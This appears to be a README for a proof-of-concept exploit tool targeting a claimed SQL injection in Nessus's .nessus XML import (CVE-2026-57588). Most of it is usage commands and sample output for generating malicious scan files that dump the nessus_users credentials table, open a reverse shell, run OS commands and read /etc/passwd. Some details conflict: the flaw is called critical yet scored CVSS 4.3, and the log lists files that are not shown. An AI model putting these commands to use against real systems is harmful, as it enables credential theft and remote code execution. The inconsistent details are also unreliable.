PoC for CVE-2026-57588 - SQL injection in Nessus 10.12.0 XML import. Generates malicious .nessus files to enumerate databases, exfiltrate credentials, and test time-based blind injection. For authorized security research. Author: Sudeepa Wanigarathna. Patched in 10.12.1.
CVE-2026-57588 is a critical SQL injection vulnerability discovered in Tenable Nessus versions 10.12.0 and prior. The vulnerability resides in the XML parsing mechanism when importing .nessus scan result files, allowing authenticated users with import privileges to execute arbitrary SQL queries against the backend PostgreSQL database.
| Property | Value |
|---|---|
| CVE ID | CVE-2026-57588 |
| Vulnerability Type | SQL Injection |
| Affected Products | Tenable Nessus 10.12.0 and prior |
| Fixed Version | Nessus 10.12.1 and later |
| CVSS Score | 4.3 (Medium) |
| Attack Vector | Network |
| Attack Complexity | Low |
| Privileges Required | Authenticated (Import permissions) |
| User Interaction | Required (Social engineering) |
| Impact | Data exfiltration, RCE |
The vulnerability exists due to insufficient sanitization of XML tag values before they are incorporated into SQL queries during the import process. A malicious actor can craft a .nessus file containing specially crafted SQL injection payloads in XML tags such as:
hostnamefqdnossystem-typemac-addressnetbios-nameWhen a privileged user imports the malicious file, the unsanitized values are executed against the PostgreSQL backend, enabling:
# Clone the repository
git clone https://github.com/CerberusMrXi/CVE-2026-57588-Nessus-XML-Import-SQL-Injection-PoC
cd CVE-2026-57588-Nessus-XML-Import-SQL-Injection-PoC
# Create and activate virtual environment
python3 -m venv venv
source venv/bin/activate # On Windows: venv\Scripts\activate
# Install dependencies
pip install -r requirements.txt
# Verify installation
python3 exploit.py --version
# Build the Docker image
docker build -t nessus-exploit .
# Run the tool
docker run -it --rm nessus-exploit generate -u https://test.com -p enum
# Install as a package
pip install -e .
# Now you can run from anywhere
nessus-exploit generate -u https://test.com -p enum
# Generate a basic enumeration exploit
python3 exploit.py generate -u https://test.com -p enum
# Generate advanced multi-stage exploit
python3 exploit.py generate -u https://test.com -p advanced -o exploit.nessus
# Extract data from database
python3 exploit.py generate -u https://test.com -p dump --table nessus_users --columns username,password_hash,email
# Show general help
python3 exploit.py --help
# Show generate command help
python3 exploit.py generate --help
# List all available payloads
python3 exploit.py list
python3 exploit.py generate -u https://test.com -p enum
[2026-07-22 10:15:23] [INFO] [*] Starting exploitation against https://test.com
[2026-07-22 10:15:23] [INFO] [*] Session: xK9mN2pQ5wR8yV7tJ4sL3fG6hD1
[2026-07-22 10:15:23] [INFO] [*] Payload: enum
[2026-07-22 10:15:23] [INFO] [*] Executing stage: fingerprint
[2026-07-22 10:15:24] [INFO] [+] Generated XML: exploit_20260722_fingerprint_101523.nessus (3847 bytes)
[2026-07-22 10:15:24] [INFO] [*] Executing stage: schema_dump
[2026-07-22 10:15:25] [INFO] [+] Generated XML: exploit_20260722_schema_dump_101524.nessus (4213 bytes)
[2026-07-22 10:15:25] [INFO] [+] Exploitation complete! Duration: 2.15s
============================================================
EXPLOITATION SUMMARY
============================================================
Target: https://test.com
Status: SUCCESS
Duration: 2.15s
Files Generated: 3
Reports Generated: 3
============================================================
python3 exploit.py generate -u https://test.com -p advanced -o custom.nessus -v
# Extract user credentials
python3 exploit.py generate -u https://test.com -p dump --table nessus_users --columns username,password_hash,email
# Extract with custom columns
python3 exploit.py generate -u https://test.com -p dump --table scan_results --columns scan_name,start_time,status
# Start listener and generate exploit
python3 exploit.py generate -u https://test.com -p shell -lp 4444 -o shell.nessus
# Execute basic commands
python3 exploit.py generate -u https://test.com -p exec --command "whoami && id && uname -a"
# Execute complex commands
python3 exploit.py generate -u https://test.com -p exec --command "ps aux | grep nessus"
# Read system files
python3 exploit.py generate -u https://test.com -p file -f /etc/passwd